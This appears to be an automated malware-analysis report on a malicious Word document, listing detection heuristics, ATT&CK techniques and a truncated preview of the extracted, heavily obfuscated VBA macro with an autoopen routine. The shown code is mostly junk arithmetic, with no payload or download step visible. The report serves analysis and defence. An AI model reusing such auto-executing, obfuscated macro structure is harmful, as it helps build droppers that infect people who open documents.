MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains a high-severity VBA macro with an AutoOpen function, indicating it attempts to execute code upon opening. The macro's obfuscated nature and the presence of GetObject calls suggest it is designed to download and execute a secondary payload, aligning with common dropper functionalities. The embedded URL, though benign, is noted as an indicator.
Heuristics 7
-
ClamAV: Doc.Malware.Droo-6895763-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Droo-6895763-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60956 bytes |
SHA-256: 58d1773ba6c26fe9bc641e3112fedd94fb4bd5dbbd967718abd23289f30e2749 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uUAAGQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YABAXD()
If SADUQQ = iQBAADC Then
uAAQ_AcB = 888878741 * Z_A1GA
mACXDGwX = KDQZ4D / 538792184 / 648401493 + 540241597 * 905772087 / 824013328 + (toXAXD - Tan(ZcDAAAA + 805681129 - 851011768 - Oct(zAUQZcBD - Hex(768606491) + 36956884 + Oct(892315431))) + (480647307 / Sqr(40570017)))
E1XQxB = 464988884 * SUDXAkBG
End If
If XAoxwXo = qkUUUkB Then
JkwQAAQB = 309639586 * jBGc4D
ZUA4Qx = dAAQAAU / 794003604 / 100734420 + 385941752 * 901536742 / 212631724 + (SoAwxc - Tan(pA_Qkw_ + 512281271 - 677824301 - Oct(NwDAAA - Hex(189007814) + 442545052 + Oct(876327097))) + (871803250 / Sqr(203362537)))
AAABoAx = 32221473 * zBAcAX
End If
If hADcAxG = vBZZBB4c Then
GDCUAAxU = 855403583 * sGCDAc
OQXDCQD = JUxAAGU / 75520102 / 698186674 + 538163502 * 667638725 / 249789112 + (qQ4AXQ - Tan(dADCDC1 + 993441065 - 838481048 - Oct(aQAA1A - Hex(986194334) + 228953373 + Oct(296958164))) + (216628725 / Sqr(447222976)))
zZD1DZX = 176219481 * r1A_BQA
End If
If RoXGok_B = Ox1DQUQ4 Then
vCDZBBA = 295894980 * UCAAAw
ScAXBXw = NwDUoZ / 209823501 / 30696457 + 381666527 * 528298984 / 681695391 + (PAD_BAw - Tan(c4xABoAk + 147684985 - 273512151 - Oct(cAkAQA - Hex(605771107) + 313793255 + Oct(769051826))) + (682560952 / Sqr(418414289)))
iZDDAo = 310648932 * jAG4GA
End If
If DZUB1kD = iBXAwAc Then
wDxAkBB = 685102660 * PAAAcx
j4x_ADD = SAXwcX / 28805962 / 924213397 + 659305860 * 305546913 / 805719473 + (l44QAA - Tan(KAAo1o + 427230615 - 465388462 - Oct(JAA_oADA - Hex(139328790) + 14449318 + Oct(519724927))) + (322441204 / Sqr(700461209)))
bBUBk1AB = 116906929 * tDGA4_X
End If
If zDAckAX = ZUAAAAxA Then
bUxDAwUQ = 828576262 * qwADG1
YDDcZZC = tAAC_Q_A / 910957438 / 7896490 + 11474067 * 754344539 / 400014959 + (RQGZUCQ - Tan(ZAAAAQ + 876080710 - 864828435 - Oct(iBU1AGQX - Hex(747469874) + 300746359 + Oct(750140348))) + (667057452 / Sqr(64534236)))
jcA__Akw = 552311063 * LxXUkA
End If
If TQ_BXA = LAAAAw4o Then
OAUBGUCk = 344232585 * voQAAG
pA_AAA = iDAc1XB / 986043874 / 563166946 + 301960935 * 807096671 / 855556357 + (CUAGA_X - Tan(ckAAxA + 580273531 - 646137033 - Oct(G1QXAoA - Hex(28541599) + 539684308 + Oct(346980475))) + (336587771 / Sqr(865762115)))
JQQUD4 = 541918621 * E4o_AAA
End If
If FUkAAAG = bQ1AUQBA Then
YBAXAxZA = 491993165 * roAZBDDA
WCkDkXZ = ZcUBD4 / 306634791 / 204146704 + 780307494 * 312953431 / 339698840 + (XAUoD1 - Tan(LAcDAoG + 111908974 - 237480094 - Oct(MU4oAxBA - Hex(270982720) + 144136245 + Oct(575722000))) + (18865400 / Sqr(706819969)))
ZDUwAX = 839933053 * dU_AUA
End If
If EDAA4AA = L1QAcxAD Then
oUAxADQG = 435303769 * jAB1ADU
RAAkoACo = AxQAAGx / 69795275 / 875219443 + 48581205 * 62254386 / 265738484 + (NQxccAAw - Tan(XQBCk4AA + 716241499 - 11720814 - Oct(vCZ441B - Hex(402114629) + 828613375 + Oct(68065683))) + (545619320 / Sqr(171020734)))
UcA4QA = 375754650 * bkDCAAAQ
End If
End Function
Sub autoopen()
On Error Resume Next
If lAoCAAxD = u__1AUD Then
nDwA1A = 812616669 * YAAxQA
qwAGCD = SDQAAAA / 416222261 / 997207107 + 394096036 * 322589883 / 519404136 + (ocDc4AG - Tan(WQDBoXDQ + 273806910 - 146596640 - Oct(ExAcQQZx - Hex(140042709) + 719667344 + Oct(235671124))) + (293120058 / Sqr(233511879)))
ic_oA_kD = 889587650 * SwA4ADA
End If
If joAAZAA = mAZxAD Then
uAAQAX = 278701557 * mAA4_cB
dBADA4 = MXDBcoA / 353977103 / 267331403 + 103246264 * 230330714 / 716065697 + (IQxQAGU - Tan(wAZAAAAB + 450182160 - 599796431 - Oct(FAAAQ4AX - Hex(889495288) + 353323007 + Oct(555858182))) + (269642298 / Sqr(901513165)))
DQc_wC = 437399596 * ZAcD_Q
End If
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.